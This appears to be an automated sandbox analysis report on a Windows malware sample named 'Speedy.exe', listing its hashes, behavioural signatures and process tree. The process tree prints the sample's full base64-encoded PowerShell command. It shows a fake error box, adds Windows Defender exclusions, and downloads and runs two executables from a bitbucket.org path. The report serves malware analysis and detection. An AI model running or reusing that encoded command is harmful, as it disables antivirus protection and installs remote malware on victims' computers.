Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
21-07-2024 19:24
Static task
static1
Behavioral task
behavioral1
Sample
Speedy.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
Speedy.exe
Resource
win10v2004-20240709-en
General
-
Target
Speedy.exe
-
Size
160KB
-
MD5
7b9610cdb99b9973810e3e25e2548ba9
-
SHA1
776ecee620560f31d35fbd9894737e7b4133d29a
-
SHA256
1c0757e44587291a3152fe7c3ee1d49c64c5ad9bbfd2123a65a772783f0bc096
-
SHA512
29d185e3dcd8bfadd3f8c30bf03ac57a44d10581859a6a449339b63e86be9d02c8a9382f27d82474006770afce8f1d80cb69acd8abc761656bd9cf3d2a4e3660
-
SSDEEP
3072:Tu6Wqq2AkZytOeiibKnESWEA6eb7THe+fgy2MPSX16zhn9gkZkb/Xw:q69q2AgytuimESWEA7DfgynPSX1mn9ub
Malware Config
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 5 2364 powershell.exe 6 2364 powershell.exe 7 2364 powershell.exe 8 2364 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
Processes:
flow ioc 7 bitbucket.org 8 bitbucket.org 4 bitbucket.org 5 bitbucket.org 6 bitbucket.org -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 2364 powershell.exe 2364 powershell.exe 2364 powershell.exe 1892 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
Speedy.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3032 Speedy.exe Token: SeDebugPrivilege 2364 powershell.exe Token: SeDebugPrivilege 1892 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
Speedy.exepowershell.exedescription pid process target process PID 3032 wrote to memory of 2364 3032 Speedy.exe powershell.exe PID 3032 wrote to memory of 2364 3032 Speedy.exe powershell.exe PID 3032 wrote to memory of 2364 3032 Speedy.exe powershell.exe PID 2364 wrote to memory of 1892 2364 powershell.exe powershell.exe PID 2364 wrote to memory of 1892 2364 powershell.exe powershell.exe PID 2364 wrote to memory of 1892 2364 powershell.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Speedy.exe"C:\Users\Admin\AppData\Local\Temp\Speedy.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAbAB5ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAdQB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAANAAwADEAOgAgAE4AbwAgAFYAUABTACAAaQBzACAAYQBsAGwAbwB3AGUAZAAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBmAHgAeQAjAD4AOwAiADsAPAAjAG4AdwBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQBpAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBmAHgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABsAGoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGEAbgBvAGUAYQBzAHkAMQAvAGMAZABzAHYAZgBkAGUAcgBiAHQAYgB1AHQAeQBuAC8AcgBhAHcALwBjADAAZgA5AGQAMAA2AGEAYgAzADIAMABlAGQANgA2ADUAMwAxAGMAMgBkADEAMgBhADYAZABlAGQAOAA1ADgAOAAwADMAOABjAGMAMwAxAC8AawBwAHUAbgB0AGwAdQBjAC4AZQB4AGUAJwAsACAAPAAjAHgAaABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBzAGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBsAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZgB0AC4AZQB4AGUAJwApACkAPAAjAGUAdgB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGEAbgBvAGUAYQBzAHkAMQAvAGMAZABzAHYAZgBkAGUAcgBiAHQAYgB1AHQAeQBuAC8AcgBhAHcALwBjADAAZgA5AGQAMAA2AGEAYgAzADIAMABlAGQANgA2ADUAMwAxAGMAMgBkADEAMgBhADYAZABlAGQAOAA1ADgAOAAwADMAOABjAGMAMwAxAC8AdgBvAGwAdQBuAGUALgBlAHgAZQAnACwAIAA8ACMAcABsAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHYAZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGIAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBUAG8AcgAuAGUAeABlACcAKQApADwAIwBkAGwAagAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBrAHcAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAawB0AGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZgB0AC4AZQB4AGUAJwApADwAIwB3AGMAdQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAHEAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZwB3AHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVABvAHIALgBlAHgAZQAnACkAPAAjAHUAaQBzACMAPgA="2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#quz#>[System.Windows.Forms.MessageBox]::Show('Error 401: No VPS is allowed!','','OK','Error')<#fxy#>;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c3e23a674037974ce33009b2973f2c23
SHA124c7a1c0d5b2ea895d56b52129ab4ca6f0e5b21e
SHA256ec3f82cbe08fbafcb66bb15a64c5c270eb097b8d42dbd7b720509451aa556507
SHA512ba1782aa7c2ec142000a7675ff4cf92481c9b6cd5e7a79578d987fde0b7febc7ba36b63e8811fe0031d95d9dc5dde9753b347a5b7436192ac1ba3b802039e296